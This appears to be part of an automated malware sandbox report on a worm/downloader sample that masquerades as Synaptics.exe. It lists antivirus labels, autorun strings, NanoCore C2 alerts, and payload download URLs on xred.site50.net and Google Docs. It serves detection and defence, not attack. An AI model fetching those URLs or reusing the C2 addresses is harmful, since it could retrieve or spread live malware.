            Source: 20.0.Synaptics.exe.400000.6.unpack, Avira: Label: W2000M/Dldr.Agent.17651006
            Source: 20.0.Synaptics.exe.400000.6.unpack, Avira: Label: TR/Dropper.Gen
            Source: 23.0.Synaptics.exe.400000.16.unpack, Avira: Label: WORM/Dldr.Agent.gqrxn
            Source: 23.0.Synaptics.exe.400000.16.unpack, Avira: Label: W2000M/Dldr.Agent.17651006
            Source: 23.0.Synaptics.exe.400000.16.unpack, Avira: Label: TR/Dropper.Gen
            Source: 4.0.y8kdmHi6x3.exe.400000.21.unpack, Avira: Label: WORM/Dldr.Agent.gqrxn
            Source: 4.0.y8kdmHi6x3.exe.400000.21.unpack, Avira: Label: W2000M/Dldr.Agent.17651006
            Source: 4.0.y8kdmHi6x3.exe.400000.21.unpack, Avira: Label: TR/Dropper.Gen
            Source: 4.0.y8kdmHi6x3.exe.400000.14.unpack, Avira: Label: WORM/Dldr.Agent.gqrxn
            Source: 4.0.y8kdmHi6x3.exe.400000.14.unpack, Avira: Label: W2000M/Dldr.Agent.17651006
            Source: 4.0.y8kdmHi6x3.exe.400000.14.unpack, Avira: Label: TR/Dropper.Gen
            Source: 9.0.WINDOWS.EXE.400000.0.unpack, Avira: Label: WORM/Dldr.Agent.gqrxn
            Source: 9.0.WINDOWS.EXE.400000.0.unpack, Avira: Label: TR/Dropper.MSIL.Gen7
            Source: 9.0.WINDOWS.EXE.400000.0.unpack, Avira: Label: W2000M/Dldr.Agent.17651006
            Source: 21.0.Synaptics.exe.400000.10.unpack, Avira: Label: WORM/Dldr.Agent.gqrxn
            Source: 21.0.Synaptics.exe.400000.10.unpack, Avira: Label: W2000M/Dldr.Agent.17651006
            Source: 21.0.Synaptics.exe.400000.10.unpack, Avira: Label: TR/Dropper.Gen
            Source: 20.2.Synaptics.exe.400000.0.unpack, Avira: Label: WORM/Dldr.Agent.gqrxn
            Source: 20.2.Synaptics.exe.400000.0.unpack, Avira: Label: W2000M/Dldr.Agent.17651006
            Source: 20.2.Synaptics.exe.400000.0.unpackAvira: Label: WORM/Dldr.Agent.gqrxn
            Source: 20.2.Synaptics.exe.400000.0.unpackAvira: Label: TR/Dropper.Gen
            Source: 20.2.Synaptics.exe.400000.0.unpackAvira: Label: W2000M/Dldr.Agent.17651006
            Source: y8kdmHi6x3.exe | Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
            Source: C:\Users\user\Desktop\._cache_WINDOWS.EXE | File opened: C:\Windows\WinSxS\x86_microsoft.vc80.crt_1fc8b3b9a1e18e3b_8.0.50727.9445_none_d08c58b4442ba54f\MSVCR80.dll
            Source: unknown | HTTPS traffic detected: 142.250.186.46:443 -> 192.168.2.3:49766 version: TLS 1.2
            Source: unknown | HTTPS traffic detected: 142.250.186.46:443 -> 192.168.2.3:49765 version: TLS 1.2
            Source: y8kdmHi6x3.exe | Static PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
            Source: Binary string: C:\Users\DarkCoderSc\Desktop\Celesty Binder\Stub\STATIC\Stub.pdb source: y8kdmHi6x3.exe, 00000000.00000002.330915609.0000000004499000.00000004.00000800.00020000.00000000.sdmp, y8kdmHi6x3.exe, 00000004.00000000.317487314.00000000004A5000.00000040.00000400.00020000.00000000.sdmp, ._cache_y8kdmHi6x3.exe, 00000006.00000000.323334149.00000000003C9000.00000002.00000001.01000000.00000005.sdmp, ._cache_y8kdmHi6x3.exe, 00000006.00000002.330463790.00000000003C9000.00000002.00000001.01000000.00000005.sdmp, Synaptics.exe, 00000008.00000002.404592341.0000000004B59000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 0000000C.00000002.423679022.0000000004579000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 0000000F.00000002.434303523.0000000004D59000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000014.00000000.386810827.00000000004A5000.00000040.00000400.00020000.00000000.sdmp, Synaptics.exe, 00000015.00000000.390475509.00000000004A5000.00000040.00000400.00020000.00000000.sdmp, Synaptics.exe, 00000017.00000000.401578463.00000000004A5000.00000040.00000400.00020000.00000000.sdmp
            Source: Binary string: &C:\Users\DarkCoderSc\Desktop\Celesty Binder\Stub\STATIC\Stub.pdb source: y8kdmHi6x3.exe, 00000000.00000002.330915609.0000000004499000.00000004.00000800.00020000.00000000.sdmp, y8kdmHi6x3.exe, 00000004.00000000.317487314.00000000004A5000.00000040.00000400.00020000.00000000.sdmp, ._cache_y8kdmHi6x3.exe, 00000006.00000000.323334149.00000000003C9000.00000002.00000001.01000000.00000005.sdmp, ._cache_y8kdmHi6x3.exe, 00000006.00000002.330463790.00000000003C9000.00000002.00000001.01000000.00000005.sdmp, Synaptics.exe, 00000008.00000002.404592341.0000000004B59000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 0000000C.00000002.423679022.0000000004579000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 0000000F.00000002.434303523.0000000004D59000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000014.00000000.386810827.00000000004A5000.00000040.00000400.00020000.00000000.sdmp, Synaptics.exe, 00000015.00000000.390475509.00000000004A5000.00000040.00000400.00020000.00000000.sdmp, Synaptics.exe, 00000017.00000000.401578463.00000000004A5000.00000040.00000400.00020000.00000000.sdmp
            Source: y8kdmHi6x3.exe, 00000000.00000002.330915609.0000000004499000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: [autorun]
            Source: y8kdmHi6x3.exe, 00000000.00000002.330915609.0000000004499000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: autorun.inf
            Source: y8kdmHi6x3.exe | Binary or memory string: autorun.inf
            Source: y8kdmHi6x3.exe | Binary or memory string: [autorun]
            Source: y8kdmHi6x3.exe, 00000004.00000000.317412867.0000000000400000.00000040.00000400.00020000.00000000.sdmp | Binary or memory string: [autorun]
            Source: y8kdmHi6x3.exe, 00000004.00000000.317412867.0000000000400000.00000040.00000400.00020000.00000000.sdmp | Binary or memory string: autorun.inf
            Source: y8kdmHi6x3.exe, 00000004.00000002.329204353.0000000000400000.00000040.00000400.00020000.00000000.sdmp | Binary or memory string: [autorun]
            Source: y8kdmHi6x3.exe, 00000004.00000002.329204353.0000000000400000.00000040.00000400.00020000.00000000.sdmp | Binary or memory string: autorun.inf
            Source: y8kdmHi6x3.exe, 00000004.00000000.317487314.00000000004A5000.00000040.00000400.00020000.00000000.sdmp | Binary or memory string: [autorun]
            Source: y8kdmHi6x3.exe, 00000004.00000000.317487314.00000000004A5000.00000040.00000400.00020000.00000000.sdmp | Binary or memory string: autorun.inf
            Source: y8kdmHi6x3.exe, 00000004.00000000.310332438.0000000000400000.00000040.00000400.00020000.00000000.sdmp | Binary or memory string: [autorun]
            Source: y8kdmHi6x3.exe, 00000004.00000000.310332438.0000000000400000.00000040.00000400.00020000.00000000.sdmp | Binary or memory string: autorun.inf
            Source: ._cache_y8kdmHi6x3.exe, 00000006.00000000.323345675.00000000003CF000.00000002.00000001.01000000.00000005.sdmp | Binary or memory string: [autorun]
            Source: ._cache_y8kdmHi6x3.exe, 00000006.00000000.323345675.00000000003CF000.00000002.00000001.01000000.00000005.sdmp | Binary or memory string: autorun.inf
            Source: Synaptics.exe, 00000008.00000002.404592341.0000000004B59000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: [autorun]
            Source: Synaptics.exe, 00000008.00000002.404592341.0000000004B59000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: autorun.inf
            Source: WINDOWS.EXE | Binary or memory string: autorun.inf
            Source: WINDOWS.EXE | Binary or memory string: [autorun]
            Source: WINDOWS.EXE, 00000009.00000000.329285707.0000000000401000.00000020.00000001.01000000.00000008.sdmp | Binary or memory string: [autorun]
            Source: WINDOWS.EXE, 00000009.00000000.329285707.0000000000401000.00000020.00000001.01000000.00000008.sdmp | Binary or memory string: autorun.inf
            Source: Synaptics.exe, 0000000C.00000002.423679022.0000000004579000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: [autorun]
            Source: Synaptics.exe, 0000000C.00000002.423679022.0000000004579000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: autorun.inf
            Source: Synaptics.exe, 0000000F.00000002.434303523.0000000004D59000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: [autorun]
            Source: Synaptics.exe, 0000000F.00000002.434303523.0000000004D59000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: autorun.inf
            Source: Synaptics.exe, 00000014.00000000.386522455.0000000000400000.00000040.00000400.00020000.00000000.sdmp | Binary or memory string: [autorun]
            Source: Synaptics.exe, 00000014.00000000.386522455.0000000000400000.00000040.00000400.00020000.00000000.sdmp | Binary or memory string: autorun.inf
            Source: Synaptics.exe, 00000014.00000000.442202940.0000000000400000.00000040.00000400.00020000.00000000.sdmp | Binary or memory string: [autorun]
            Source: Synaptics.exe, 00000014.00000000.442202940.0000000000400000.00000040.00000400.00020000.00000000.sdmp | Binary or memory string: autorun.inf
            Source: Synaptics.exe, 00000014.00000000.386810827.00000000004A5000.00000040.00000400.00020000.00000000.sdmp | Binary or memory string: [autorun]
            Source: Synaptics.exe, 00000014.00000000.386810827.00000000004A5000.00000040.00000400.00020000.00000000.sdmp | Binary or memory string: autorun.inf
            Source: Synaptics.exe, 00000014.00000000.375965168.0000000000400000.00000040.00000400.00020000.00000000.sdmp | Binary or memory string: [autorun]
            Source: Synaptics.exe, 00000014.00000000.375965168.0000000000400000.00000040.00000400.00020000.00000000.sdmp | Binary or memory string: autorun.inf
            Source: Synaptics.exe, 00000015.00000000.387756997.0000000000400000.00000040.00000400.00020000.00000000.sdmp | Binary or memory string: [autorun]
            Source: Synaptics.exe, 00000015.00000000.387756997.0000000000400000.00000040.00000400.00020000.00000000.sdmp | Binary or memory string: autorun.inf
            Source: Synaptics.exe, 00000015.00000000.390475509.00000000004A5000.00000040.00000400.00020000.00000000.sdmp | Binary or memory string: [autorun]
            Source: Synaptics.exe, 00000015.00000000.390475509.00000000004A5000.00000040.00000400.00020000.00000000.sdmp | Binary or memory string: autorun.inf
            Source: Synaptics.exe, 00000015.00000002.401565081.0000000000400000.00000040.00000400.00020000.00000000.sdmp | Binary or memory string: [autorun]
            Source: Synaptics.exe, 00000015.00000002.401565081.0000000000400000.00000040.00000400.00020000.00000000.sdmp | Binary or memory string: autorun.inf
            Source: Synaptics.exe, 00000015.00000000.380393313.0000000000400000.00000040.00000400.00020000.00000000.sdmp | Binary or memory string: [autorun]
            Source: Synaptics.exe, 00000015.00000000.380393313.0000000000400000.00000040.00000400.00020000.00000000.sdmp | Binary or memory string: autorun.inf
            Source: Synaptics.exe, 00000017.00000000.401578463.00000000004A5000.00000040.00000400.00020000.00000000.sdmp | Binary or memory string: [autorun]
            Source: Synaptics.exe, 00000017.00000000.401578463.00000000004A5000.00000040.00000400.00020000.00000000.sdmp | Binary or memory string: autorun.inf
            Source: Synaptics.exe, 00000017.00000000.392515313.0000000000400000.00000040.00000400.00020000.00000000.sdmp | Binary or memory string: [autorun]
            Source: Synaptics.exe, 00000017.00000000.392515313.0000000000400000.00000040.00000400.00020000.00000000.sdmp | Binary or memory string: autorun.inf
            Source: Synaptics.exe, 00000017.00000002.422072691.0000000000400000.00000040.00000400.00020000.00000000.sdmp | Binary or memory string: [autorun]
            Source: Synaptics.exe, 00000017.00000002.422072691.0000000000400000.00000040.00000400.00020000.00000000.sdmp | Binary or memory string: autorun.inf
            Source: Synaptics.exe, 00000017.00000000.387352587.0000000000400000.00000040.00000400.00020000.00000000.sdmp | Binary or memory string: [autorun]
            Source: Synaptics.exe, 00000017.00000000.387352587.0000000000400000.00000040.00000400.00020000.00000000.sdmp | Binary or memory string: autorun.inf
            Source: C:\Users\user\Desktop\y8kdmHi6x3.exe | File opened: C:\Users\user
            Source: C:\Users\user\Desktop\y8kdmHi6x3.exe | File opened: C:\Users\user\AppData\Roaming\Microsoft
            Source: C:\Users\user\Desktop\y8kdmHi6x3.exe | File opened: C:\Users\user\AppData
            Source: C:\Users\user\Desktop\y8kdmHi6x3.exe | File opened: C:\Users\user\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\desktop.ini
            Source: C:\Users\user\Desktop\y8kdmHi6x3.exe | File opened: C:\Users\user\AppData\Roaming
            Source: C:\Users\user\Desktop\y8kdmHi6x3.exe | File opened: C:\Users\user\AppData\Roaming\Microsoft\Internet Explorer
            Source: C:\Users\user\Desktop\y8kdmHi6x3.exe | Code function: 4_2_004099E0 FindFirstFileA,FindClose,FileTimeToLocalFileTime,FileTimeToDosDateTime, 4_2_004099E0
            Source: C:\Users\user\Desktop\y8kdmHi6x3.exe | Code function: 4_2_00406018 GetModuleHandleA,GetProcAddress,lstrcpyn,lstrcpyn,lstrcpyn,FindFirstFileA,FindClose,lstrlen,lstrcpyn,lstrlen,lstrcpyn, 4_2_00406018
            Source: C:\Users\user\Desktop\WINDOWS.EXE | Code function: 9_2_004099E0 FindFirstFileA,FindClose,FileTimeToLocalFileTime,FileTimeToDosDateTime, 9_2_004099E0
            Source: C:\Users\user\Desktop\WINDOWS.EXE | Code function: 9_2_00406018 GetModuleHandleA,GetProcAddress,lstrcpyn,lstrcpyn,lstrcpyn,FindFirstFileA,FindClose,lstrlen,lstrcpyn,lstrlen,lstrcpyn, 9_2_00406018
            Source: C:\Users\user\Desktop\WINDOWS.EXE | Code function: 9_2_00409B1C FindFirstFileA,GetLastError, 9_2_00409B1C

            Networking

            Source: Traffic | Snort IDS: 2025019 ET TROJAN Possible NanoCore C2 60B 192.168.2.3:49751 -> 54.38.136.57:53811
            Source: Traffic | Snort IDS: 2025019 ET TROJAN Possible NanoCore C2 60B 192.168.2.3:49755 -> 54.38.136.57:53811
            Source: Traffic | Snort IDS: 2025019 ET TROJAN Possible NanoCore C2 60B 192.168.2.3:49757 -> 54.38.136.57:53811
            Source: Traffic | Snort IDS: 2025019 ET TROJAN Possible NanoCore C2 60B 192.168.2.3:49783 -> 54.38.136.57:53811
            Source: Traffic | Snort IDS: 2025019 ET TROJAN Possible NanoCore C2 60B 192.168.2.3:49785 -> 54.38.136.57:53811
            Source: Traffic | Snort IDS: 2025019 ET TROJAN Possible NanoCore C2 60B 192.168.2.3:49786 -> 54.38.136.57:53811
            Source: Traffic | Snort IDS: 2025019 ET TROJAN Possible NanoCore C2 60B 192.168.2.3:49804 -> 54.38.136.57:53811
            Source: Traffic | Snort IDS: 2025019 ET TROJAN Possible NanoCore C2 60B 192.168.2.3:49812 -> 54.38.136.57:53811
            Source: Traffic | Snort IDS: 2025019 ET TROJAN Possible NanoCore C2 60B 192.168.2.3:49829 -> 54.38.136.57:53811
            Source: Traffic | Snort IDS: 2025019 ET TROJAN Possible NanoCore C2 60B 192.168.2.3:49848 -> 54.38.136.57:53811
            Source: Traffic | Snort IDS: 2025019 ET TROJAN Possible NanoCore C2 60B 192.168.2.3:49853 -> 54.38.136.57:53811
            Source: Traffic | Snort IDS: 2025019 ET TROJAN Possible NanoCore C2 60B 192.168.2.3:49855 -> 54.38.136.57:53811
            Source: global traffic | TCP traffic: 54.38.136.57 ports 48129,1,2,8808,4,8,53811,9
            Source: unknown | DNS query: name: freedns.afraid.org
            Source: global traffic | TCP traffic: 192.168.2.3:49749 -> 54.38.136.57:48129
            Source: Synaptics.exe, 00000014.00000002.529484734.0000000007922000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
            Source: Synaptics.exe, 00000017.00000000.387352587.0000000000400000.00000040.00000400.00020000.00000000.sdmp | String found in binary or memory: http://freedns.afraid.org/api/?action=getdyndns&sha=a30fa98efc092684e8d1c5cff797bcc613562978
            Source: Synaptics.exe, 00000014.00000002.527570253.00000000012C9000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://freedns.afraid.org/api/?action=getdyndns&sha=a30fa98efc092684e8d1c5cff797bcc613562978$1
            Source: SYSTEM32.EXE | String found in binary or memory: http://schemas.microsof
            Source: WINDOWS.EXE, 00000009.00000003.336747478.00000000022F0000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://xred.site50.net/syn/SSLLibrary.dl
            Source: Synaptics.exe, 00000017.00000000.387352587.0000000000400000.00000040.00000400.00020000.00000000.sdmp | String found in binary or memory: http://xred.site50.net/syn/SSLLibrary.dll
            Source: Synaptics.exe, 00000014.00000002.527933860.0000000002E10000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://xred.site50.net/syn/SSLLibrary.dll6
            Source: y8kdmHi6x3.exe, 00000004.00000003.328489668.0000000003030000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://xred.site50.net/syn/SSLLibrary.dlp
            Source: Synaptics.exe, 00000017.00000000.387352587.0000000000400000.00000040.00000400.00020000.00000000.sdmp | String found in binary or memory: http://xred.site50.net/syn/SUpdate.ini
            Source: y8kdmHi6x3.exe, 00000004.00000003.328489668.0000000003030000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://xred.site50.net/syn/SUpdate.iniD0
            Source: WINDOWS.EXE, 00000009.00000003.336747478.00000000022F0000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://xred.site50.net/syn/SUpdate.iniD0/
            Source: Synaptics.exe, 00000014.00000002.527933860.0000000002E10000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://xred.site50.net/syn/SUpdate.iniZ
            Source: Synaptics.exe, 00000017.00000000.387352587.0000000000400000.00000040.00000400.00020000.00000000.sdmp | String found in binary or memory: http://xred.site50.net/syn/Synaptics.rar
            Source: Synaptics.exe, 00000014.00000002.527933860.0000000002E10000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://xred.site50.net/syn/Synaptics.rarZ
            Source: Synaptics.exe, 00000014.00000000.445482616.0000000001344000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000014.00000000.438951576.00000000079C2000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://csp.withgoogle.com/csp/drive-explorer/
            Source: Synaptics.exe, 00000014.00000000.431941807.0000000001373000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://csp.withgoogle.com/csp/drive-explorer/7
            Source: Synaptics.exe, 00000014.00000000.431941807.0000000001373000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://csp.withgoogle.com/csp/drive-explorer/7A8
            Source: Synaptics.exe, 00000014.00000002.529402333.0000000007916000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://csp.withgoogle.com/csp/drive-explorer/w
            Source: Synaptics.exe, 00000014.00000000.445482616.0000000001344000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000014.00000000.438951576.00000000079C2000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://csp.withgoogle.com/csp/report-to/gse_l9ocaq
            Source: Synaptics.exe, 00000014.00000000.445482616.0000000001344000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://docs.goo
            Source: Synaptics.exe, 00000014.00000000.448364389.0000000008ECE000.00000004.00000010.00020000.00000000.sdmp | String found in binary or memory: https://docs.goog
            Source: Synaptics.exe, 00000014.00000002.527672867.000000000131A000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000014.00000000.447489062.00000000079A3000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://docs.google.com/
            Source: Synaptics.exe, 00000014.00000000.447489062.00000000079A3000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://docs.google.com/S
            Source: y8kdmHi6x3.exe, 00000004.00000003.328489668.0000000003030000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSTmlVYkxhSDg5TzQ&export=downlo
            Source: Synaptics.exe, 00000017.00000000.387352587.0000000000400000.00000040.00000400.00020000.00000000.sdmp | String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSTmlVYkxhSDg5TzQ&export=download
            Source: Synaptics.exe, 00000014.00000002.527933860.0000000002E10000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSTmlVYkxhSDg5TzQ&export=downloadN
            Source: WINDOWS.EXE, 00000009.00000003.336747478.00000000022F0000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSTmlVYkxhSDg5TzQ&export=downlop
            Source: Synaptics.exe, 00000014.00000000.446360400.0000000006DFD000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 00000014.00000002.531566369.000000000950E000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 00000014.00000000.433312249.000000000717D000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 00000014.00000000.448502612.00000000093CE000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 00000014.00000002.531400258.000000000900E000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 00000014.00000000.433243588.000000000703D000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 00000014.00000002.531929602.0000000009D4E000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 00000014.00000002.531339154.0000000008D8E000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 00000014.00000002.531642477.000000000978E000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 00000014.00000000.440101952.0000000008AFE000.00000004.00000010.00020000.00000000.sdmp | String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&expo
            Source: Synaptics.exe, 00000014.00000000.448472655.000000000928E000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 00000014.00000000.448435227.000000000914E000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 00000014.00000002.531299488.0000000008C4E000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 00000014.00000000.448937298.0000000009C0E000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 00000014.00000000.448040198.00000000084FE000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 00000014.00000000.448191184.000000000877E000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 00000014.00000002.531838895.0000000009ACE000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 00000014.00000000.448565852.000000000964E000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 00000014.00000000.432142261.000000000353D000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 00000014.00000000.439872700.000000000863E000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 00000014.00000000.440050531.00000000089BE000.00000004.00000010.00020000.00000000.sdmp | String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=d
            Source: WINDOWS.EXE, 00000009.00000003.336747478.00000000022F0000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downlo
            Source: Synaptics.exe, 00000017.00000000.387352587.0000000000400000.00000040.00000400.00020000.00000000.sdmp | String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
            Source: Synaptics.exe, 00000014.00000002.529484734.0000000007922000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download#
            Source: Synaptics.exe, 00000014.00000002.529484734.0000000007922000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000014.00000000.438951576.00000000079C2000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download$
            Source: Synaptics.exe, 00000014.00000000.445482616.0000000001344000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download%
            Source: Synaptics.exe, 00000014.00000002.529484734.0000000007922000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download(
            Source: Synaptics.exe, 00000014.00000002.527672867.000000000131A000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download(o2
            Source: Synaptics.exe, 00000014.00000000.445482616.0000000001344000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download)
            Source: Synaptics.exe, 00000014.00000002.529484734.0000000007922000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download.
            Source: Synaptics.exe, 00000014.00000002.529484734.0000000007922000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download/c
            Source: Synaptics.exe, 00000014.00000002.529484734.0000000007922000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download0v
            Source: Synaptics.exe, 00000014.00000002.529484734.0000000007922000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download0x
            Source: Synaptics.exe, 00000014.00000000.438951576.00000000079C2000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download1
            Source: Synaptics.exe, 00000014.00000002.529484734.0000000007922000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download12
            Source: Synaptics.exe, 00000014.00000002.527672867.000000000131A000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download2
            Source: Synaptics.exe, 00000014.00000002.529484734.0000000007922000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download5
            Source: Synaptics.exe, 00000014.00000002.529484734.0000000007922000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download6
            Source: Synaptics.exe, 00000014.00000000.431941807.0000000001373000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download8
            Source: Synaptics.exe, 00000014.00000000.445482616.0000000001344000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000014.00000002.527570253.00000000012C9000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download9
            Source: Synaptics.exe, 00000014.00000002.529484734.0000000007922000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadB
            Source: Synaptics.exe, 00000014.00000002.529484734.0000000007922000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadCo
            Source: Synaptics.exe, 00000014.00000000.445482616.0000000001344000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadE
            Source: Synaptics.exe, 00000014.00000002.529484734.0000000007922000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadF
            Source: Synaptics.exe, 00000014.00000000.445482616.0000000001344000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000014.00000000.438951576.00000000079C2000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadI
            Source: Synaptics.exe, 00000014.00000002.527933860.0000000002E10000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadJ
            Source: Synaptics.exe, 00000014.00000000.431941807.0000000001373000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000014.00000002.529484734.0000000007922000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadK
            Source: Synaptics.exe, 00000014.00000002.529484734.0000000007922000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadL
            Source: Synaptics.exe, 00000014.00000002.529484734.0000000007922000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadN
            Source: Synaptics.exe, 00000014.00000000.431941807.0000000001373000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadP
